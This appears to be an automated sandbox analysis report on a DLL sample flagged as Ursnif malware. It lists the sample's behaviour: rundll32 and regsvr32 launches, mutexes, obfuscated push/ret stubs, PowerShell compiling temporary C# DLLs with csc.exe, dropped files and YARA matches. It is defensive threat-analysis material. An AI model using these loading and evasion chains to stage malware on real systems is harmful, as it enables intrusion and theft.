Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 1_2_017D2AB4
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{F408F8B3-C39F-46C2-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A446E4F3-B3E1-76BB-5D18-970AE1CCBBDE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{D456EBDA-23D4-26AB-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{ECD50131-5BD8-FE31-45E0-BF1249146366}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{D47D1D27-23CF-266A-4D48-07BAD1FC2B8E}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{D8EBAF0D-57FD-CA7A-A18C-7B9E6580DFB2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{700550A9-0FDA-2200-19A4-B3765D18970A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: status.dll Static file information: File size 1235456 > 1048576
Source: status.dll Static PE information: Raw size of .data is bigger than: 0x100000 < 0x121200
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D7DE0 push ecx; ret 1_2_017D7DE9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D81CB push ecx; ret 1_2_017D81DB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE06F5 push dword ptr [ebp-00000284h]; ret 1_2_00FE0764
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0AB8 push edx; ret 1_2_00FE0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0880 push dword ptr [ebp-00000284h]; ret 1_2_00FE08B6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0A64 push edx; ret 1_2_00FE0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0A64 push dword ptr [esp+10h]; ret 1_2_00FE0BFB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0BFC push dword ptr [esp+0Ch]; ret 1_2_00FE0C10
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0BFC push dword ptr [esp+10h]; ret 1_2_00FE0C56
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE05DF push dword ptr [ebp-00000284h]; ret 1_2_00FE087F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B23713 push ecx; ret 1_2_03B23723
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D481CB push ecx; ret 4_2_02D481DB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D47DE0 push ecx; ret 4_2_02D47DE9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960880 push dword ptr [ebp-00000284h]; ret 4_2_009608B6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960AB8 push edx; ret 4_2_00960B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_009606F5 push dword ptr [ebp-00000284h]; ret 4_2_00960764
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960A64 push edx; ret 4_2_00960B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960A64 push dword ptr [esp+10h]; ret 4_2_00960BFB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_009605DF push dword ptr [ebp-00000284h]; ret 4_2_0096087F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960BFC push dword ptr [esp+0Ch]; ret 4_2_00960C10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960BFC push dword ptr [esp+10h]; ret 4_2_00960C56
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_04903713 push ecx; ret 4_2_04903723
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_049031E0 push ecx; ret 4_2_049031E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA7DE0 push ecx; ret 5_2_04AA7DE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA81CB push ecx; ret 5_2_04AA81DB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C05DF push dword ptr [ebp-00000284h]; ret 5_2_031C087F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0BFC push dword ptr [esp+0Ch]; ret 5_2_031C0C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0BFC push dword ptr [esp+10h]; ret 5_2_031C0C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0A64 push edx; ret 5_2_031C0B11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0A64 push dword ptr [esp+10h]; ret 5_2_031C0BFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0880 push dword ptr [ebp-00000284h]; ret 5_2_031C08B6
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_03B039B2
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: initial sample Static PE information: section name: .text entropy: 6.95280203957

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
